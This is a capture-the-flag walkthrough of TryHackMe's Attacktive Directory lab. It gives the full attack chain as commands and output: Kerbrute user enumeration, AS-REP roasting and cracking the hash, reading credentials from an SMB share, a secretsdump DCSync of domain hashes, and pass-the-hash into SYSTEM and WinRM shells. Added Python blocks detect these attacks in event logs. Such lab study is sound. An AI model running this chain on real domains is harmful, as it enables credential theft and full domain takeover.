thm-AttacktiveDirectory-nl

Attacktive Directory – Try Hack Me

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play Attacktive Directory at Challenge

Task 1

Initiate the VPN connection and deploy the machine

Task 2 -> Impacket

Install Impacket, a collection of Python classes for working with network protocols. To learn more about Impacket and get an overview of some of its tools, you can look here.
Have a look at this GitHub repository to learn how to install it.

Task 3 -> Enumeration 1

We start by adding the IP address of our machine to /etc/hosts:

echo 10.10.166.159 spookysec.local >> /etc/hosts

Next we run an Nmap scan.

root@kali:~/thm# nmap -A 10.10.166.159 -oN aktivedirectory.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 05:16 EDT
Stats: 0:03:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:24 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.89% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:43 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 05:20 (0:00:00 remaining)
Stats: 0:03:43 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.94% done; ETC: 05:20 (0:00:00 remaining)
Nmap scan report for spookysec.local (10.10.166.159)
Host is up (0.030s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-08 09:16:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-04-03T18:40:09
|_Not valid after: 2020-10-03T18:40:09
|_ssl-date: 2020-06-08T09:19:18+00:00; -1s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/8%Time=5EDE020D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-06-08 05:19:19
|_ start_date: N/A

TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 29.06 ms 10.11.0.1
2 29.30 ms spookysec.local (10.10.166.159)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 244.31 seconds
root@kali:~/thm#

Using the ports discovered in the first scan, we run a more complete scan.

nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389 -A -T4 spookysec.local

From this scan we discover the Domain Name of the machine as well as the full AD domain.

Task 4 -> Enumeration 2

Using enum4linux we are able to enumerate ports 139 and 445. This tool has quite lengthy output, so we will only post the important parts for the walkthrough's sake.

enum4linux -A  spookysec.local

Once more, we managed to retrieve information about the full AD domain name and the Domain Name of the machine, plus some usernames that might be useful later on.

We follow using the tool Kerbrute, which can be installed using the command:

go get github.com/ropnop/kerbrute

Kerbrute is a tool that performs Kerberos pre-auth bruteforcing. In this case we will be using its username bruteforce feature.

~/go/bin/kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc 10.10.229.200 -d spookysec.local userlist.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/20/20 - Ronnie Flathers @ropnop

2020/07/20 13:35:52 > Using KDC(s):
2020/07/20 13:35:52 > 10.10.229.200:88
2020/07/20 13:35:52 > [+] VALID USERNAME: james@spookysec.local
2020/07/20 13:35:53 > [+] VALID USERNAME: svc-admin@spookysec.local
2020/07/20 13:35:54 > [+] VALID USERNAME: James@spookysec.local
2020/07/20 13:35:55 > [+] VALID USERNAME: robin@spookysec.local
2020/07/20 13:36:01 > [+] VALID USERNAME: darkstar@spookysec.local
2020/07/20 13:36:03 > [+] VALID USERNAME: administrator@spookysec.local
2020/07/20 13:36:06 > [+] VALID USERNAME: backup@spookysec.local
2020/07/20 13:36:08 > [+] VALID USERNAME: paradox@spookysec.local
2020/07/20 13:36:18 > [+] VALID USERNAME: JAMES@spookysec.local
2020/07/20 13:36:18 > [+] VALID USERNAME: puck@spookysec.local
2020/07/20 13:36:22 > [+] VALID USERNAME: Robin@spookysec.local
2020/07/20 13:36:42 > [+] VALID USERNAME: Administrator@spookysec.local
2020/07/20 13:37:28 > [+] VALID USERNAME: Darkstar@spookysec.local
2020/07/20 13:37:42 > [+] VALID USERNAME: Paradox@spookysec.local
2020/07/20 13:38:32 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2020/07/20 13:38:47 > [+] VALID USERNAME: ori@spookysec.local
2020/07/20 13:39:11 > [+] VALID USERNAME: ROBIN@spookysec.local
2020/07/20 13:41:39 > Done! Tested 100000 usernames (17 valid) in 346.729 seconds

E:\PENTEST>

Task 5 -> ASREPRoasting

From the output we are able to validate some active usernames.
Now that we have discovered several usernames, we can use a technique called ASREPRoasting: if a user does not have the Kerberos preauthentication property selected, it is possible to retrieve the password hash for that user. Impacket provides a tool called GetNPUsers.py, which can query the AD and, if the property above is not selected, export the user's TGT.

root@kali:~/thm# python GetNPUsers.py spookysec.local/svc-admin
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

Password:
[*] Cannot authenticate svc-admin, getting its TGT
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:5aeae9f1e888ac620e344710bdb8deac$29852738d58f3c4a424be360def6579858e10b926fe0d26513a609e5825a873ab5d10226f92a490e357559ed477fc2ce36449de7c56768f98a69b5b63f0ce24b40cc1d9e750b0bcf664e2aa16ae82132d974dc165cab8fd4b21072fbd4d25d95f81226d3e1adb3151262a25afe2e65e0e22973b8d84ee7c7d8e8e6b46b82edc0249d1ea91e09ca638628019f704a03e2e2c998e452d6cc6ab06961fbf220db3ad6042a34c87855b28ca8c29891f6ae292c82b800a1d2d9aea18e081dd40bf50ed9ea9142bab643a6dd8290ac18c27c5805def58ba20e1648583c3248eb0a8098090527c290539b248a625e3b32bdc63ce3fd

We are able to retrieve a hash from the svc-admin account. We now proceed to crack the hash using hashcat. To find the right mode we can have a look at the wiki page.
We have saved the previous hash in the hash.txt file.

Note: If you are using a VM the flag '--force' is required.

hashcat -m 18200 hash.txt passwordlist.txt --force

I used John

E:\john-1.9.0-jumbo-1-win64\run>john 1.hash --wordlist=e:\pentest\hashcat\rockyou.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE4.1 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 6.44% (ETA: 09:47:24) 0g/s 500502p/s 500502c/s 500502C/s MERCENARIO..MALANDI
management2005 ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
1g 0:00:00:11 DONE (2020-06-08 09:47) 0.08978g/s 524089p/s 524089c/s 524089C/s manaia010..mana741
Use the "--show" option to display all of the cracked passwords reliably
Session completed
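
On the domain controller, the Kerbrute run from Task 4 and the GetNPUsers.py request above both appear as Event ID 4768 records. The following added example (not part of the original walkthrough) flags both patterns over constructed sample events; it assumes Kerberos Authentication Service auditing is enabled for success and failure, and the tuple layout, threshold and window are illustrative choices.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4768 records as (TimeCreated, TargetUserName, IpAddress,
# Status, TicketEncryptionType, PreAuthType). Addresses and most names are made up.
EVENTS = [
    ("2020-07-20T13:35:52", "alice", "10.11.0.5", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:35:52", "bob", "10.11.0.5", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:35:53", "carol", "10.11.0.5", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:35:53", "dave", "10.11.0.5", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:35:54", "erin", "10.11.0.5", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:40:10", "typo1", "10.10.5.20", "0x6", "0xffffffff", "-"),
    ("2020-07-20T13:42:00", "svc-admin", "10.11.0.5", "0x0", "0x17", "0"),
    ("2020-07-20T13:45:00", "james", "10.10.5.21", "0x0", "0x12", "2"),
]

UNKNOWN_PRINCIPAL = 0x6  # KDC_ERR_C_PRINCIPAL_UNKNOWN: the user does not exist
RC4_HMAC = 0x17          # etype 23, the "$23$" in the $krb5asrep$ hash above


def enumeration_sources(events, threshold=5, window=timedelta(seconds=60)):
    """Source IPs that requested >= threshold distinct unknown users within window."""
    by_ip = defaultdict(list)
    for ts, user, ip, status, _etype, _pre in events:
        if int(status, 16) == UNKNOWN_PRINCIPAL:
            by_ip[ip].append((datetime.fromisoformat(ts), user.lower()))
    flagged = []
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            users = {u for t, u in hits[i:] if t - start <= window}
            if len(users) >= threshold:
                flagged.append(ip)
                break
    return sorted(flagged)


def tgt_without_preauth(events):
    """(user, ip, used_rc4) for every TGT issued with PreAuthType 0."""
    out = []
    for _ts, user, ip, status, etype, pre in events:
        if int(status, 16) == 0 and pre == "0":
            out.append((user, ip, int(etype, 16) == RC4_HMAC))
    return out


if __name__ == "__main__":
    print("enumeration sources:", enumeration_sources(EVENTS))
    print("TGTs issued without pre-auth:", tgt_without_preauth(EVENTS))
```

Any account returned by tgt_without_preauth is a candidate for re-enabling preauthentication and rotating to a long random password.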

Task 6 -> Enumeration 3

With user credentials in hand, we can attempt to log into SMB and explore any shares on the domain controller. This is possible with the tool smbclient. Make sure to use the user 'svc-admin' as well as the previously cracked password.

smbclient -L spookysec.local --user svc-admin

After exploring several shares, we found the file ‘backup_credentials.txt’.

smbclient \\\\spookysec.local\\backup --user svc-admin

Looking at the content of the file we can see it is encoded with Base64. To decode it simply use the following command:

root@kali:~/thm# base64 -d backup_credentials.txt 
backup@spookysec.local:backup2517860
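
Base64 is an encoding, not protection, so a file like this can be found by routine share hygiene checks. The following added example (not part of the original walkthrough) scans file contents for base64 tokens that decode to an account:secret pair and reports only the account; the sample files are constructed, with the first built from the decoded value shown above, and the regular expressions are illustrative assumptions.

```python
import base64
import binascii
import re

B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
# account or account@domain, a colon, then a secret of at least 6 characters
CRED = re.compile(r"^([\w.\-]+(?:@[\w.\-]+)?):(\S{6,})$")

# Constructed sample share contents.
SAMPLE_FILES = {
    "backup_credentials.txt": base64.b64encode(b"backup@spookysec.local:backup2517860"),
    "readme.txt": b"Nightly backups run at 02:00; contact the helpdesk for restores.\n",
    "checksums.txt": b"d41d8cd98f00b204e9800998ecf8427e  empty.bin\n",
}


def find_encoded_credentials(files):
    """Return (filename, account) for base64 tokens that decode to account:secret."""
    findings = []
    for name, data in files.items():
        for token in B64_TOKEN.findall(data):
            try:
                text = base64.b64decode(token, validate=True).decode("ascii")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64, or decodes to binary (e.g. a hex checksum)
            match = CRED.match(text.strip())
            if match:
                findings.append((name, match.group(1)))  # never record the secret
    return findings


if __name__ == "__main__":
    for filename, account in find_encoded_credentials(SAMPLE_FILES):
        print(f"{filename}: encoded credential for {account}")
```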

Task 7 -> Elevating Privileges

Using the backup account, we can use another tool from Impacket, this time called 'secretsdump.py'. With it we will be able to get all the password hashes that this user account has access to.

python secretsdump.py -just-dc backup@spookysec.local
root@kali:~/thm# python secretsdump.py -just-dc backup@spookysec.local
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation


Or we can run it from Windows:

E:\PENTEST>secretsdump_windows.exe -just-dc backup@spookysec.local
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:backup2517860
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
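
The DRSUAPI replication request made by secretsdump.py can be logged on the domain controller as Event ID 4662, assuming Directory Service Access auditing is enabled and the domain object carries an audit entry. This added example (not part of the original walkthrough) flags replication rights exercised by any account that is not a known domain controller, using constructed events in which only the names "backup" and ATTACKTIVEDIREC$ come from this page.

```python
import re
from collections import defaultdict

# Control-access right GUIDs for directory replication.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is used

# Constructed Event ID 4662 records (the last GUID is a made-up placeholder).
EVENTS = [
    {"SubjectUserName": "ATTACKTIVEDIREC$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "AccessMask": "0x100",
     "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"SubjectUserName": "helpdesk1", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]


def dcsync_suspects(events, domain_controllers=()):
    """Map each non-DC account to the replication rights it exercised."""
    known_dcs = {name.lower() for name in domain_controllers}
    seen = defaultdict(set)
    for ev in events:
        user = ev["SubjectUserName"]
        if user.lower() in known_dcs:
            continue  # replication between domain controllers is expected
        if not int(ev["AccessMask"], 16) & CONTROL_ACCESS:
            continue
        for guid in GUID_RE.findall(ev["Properties"]):
            right = REPL_RIGHTS.get(guid.lower())
            if right:
                seen[user].add(right)
    return {user: sorted(rights) for user, rights in seen.items()}


if __name__ == "__main__":
    for user, rights in dcsync_suspects(EVENTS, {"ATTACKTIVEDIREC$"}).items():
        print(f"replication rights used by non-DC account {user}: {rights}")
```

The allow-list is by explicit domain controller name rather than by a trailing "$", so a compromised workstation account is still reported.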

Now we are in possession of the Administrator password hash. The next step is to perform a Pass the Hash attack. We can use another tool from Impacket called 'psexec.py'. For this tool you must paste the complete Administrator hash into the following command:

root@kali:~/thm# psexec.py Administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file ifMyJYLW.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service erPK on spookysec.local.....
[*] Starting service erPK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
AttacktiveDirectory

C:\Windows\system32>

We could also use Evil-WinRM:

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.166.159 -u Administrator -H e4876a80a723612986d7609aa5ebc12b

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
AttacktiveDirectory
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Congratulations, you now have complete access to the system. Feel free to navigate to each user's Desktop and get the flags.

Author : Puckiestyle
